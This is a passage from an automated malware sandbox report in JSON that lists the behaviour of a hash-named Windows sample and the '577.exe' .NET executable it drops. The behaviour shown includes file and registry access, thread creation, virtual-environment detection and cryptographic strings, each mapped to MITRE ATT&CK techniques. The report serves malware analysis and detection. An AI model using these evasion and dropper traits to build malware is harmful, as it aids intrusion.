"identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"577.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"577.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"577.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"577.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"577.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" queries basic process information of the \"C:\\Windows\\System32\\en-US\\tzres.dll.mui\" (UID: 1916)\n \"577.exe\" queries basic process information of the \"C:\\Windows\\System32\\sspicli.dll\" (UID: 5100)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe.config\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe.Local\\\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\fusion.localgac\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Globalization\\en-us.nlp\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch.1916.908370296\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch.1916.908370296\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\E9FA1A5EBE7068F630D2612F51AB789DF437C06A6A345AB34D834986EA503B07.EXE.CONFIG\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\E9FA1A5EBE7068F630D2612F51AB789DF437C06A6A345AB34D834986EA503B07.EXE.LOCAL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\FUSION.LOCALGAC\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\SECURITY.CONFIG\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\SECURITY.CONFIG.CCH\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\ENTERPRISESEC.CONFIG\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\ENTERPRISESEC.CONFIG.CCH\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"E9FA1A5EBE7068F630D2612F51AB789DF437C06A6A345AB34D834986EA503B07\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"INSTALLROOT\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"CLRLOADLOGDIR\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"USELEGACYV2RUNTIMEACTIVATIONPOLICYDEFAULTVALUE\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"ONLYUSELATESTCLR\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\"; Key: \"NOCLIENTCHECKS\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"GCSTRESSSTART\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\.NETFRAMEWORK\"; Key: \"GCSTRESSSTARTATJIT\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\577.exe\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" writes file \"%temp%\\577.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"577.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\577.exe]- [targetUID: 00000000-00001916]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\RpcRtRemote.dll\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"577.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config\"\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\577.exe\"\n \"577.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"577.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"577.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"577.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"577.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify virtual environment by using API string", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-138", "type": 2, "relevance": 2, "name": "Contains ability to use Cryptographic classes", "description": "file/memory contains long string with (Indicator: \"Aes\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"AesGcm\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"AsymmetricAlgorithm\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"CryptoConfig\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"CryptographicException\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"CryptoStream\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"DeriveBytes\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"HashAlgorithm\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"KeySizes\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"Rfc2898DeriveBytes\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"Rijndael\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"RijndaelManaged\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"RSACryptoServiceProvider\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"SymmetricAlgorithm\"; File: \"577.exe\")\n file/memory contains long string with (Indicator: \"Aes\"; File: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp\")\n file/memory contains long string with (Indicator: \"RC2\"; File: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp\")\n Found reference to \"AsymmetricAlgorithm\" (Indicator: \"AsymmetricAlgorithm\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"RSACryptoServiceProvider\" (Indicator: \"RSACryptoServiceProvider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"CryptoConfig\" (Indicator: \"CryptoConfig\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"HashAlgorithm\" (Indicator: \"HashAlgorithm\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"RijndaelManaged\" (Indicator: \"Rijndael\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"RijndaelManaged\" (Indicator: \"RijndaelManaged\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"Rfc2898DeriveBytes\" (Indicator: 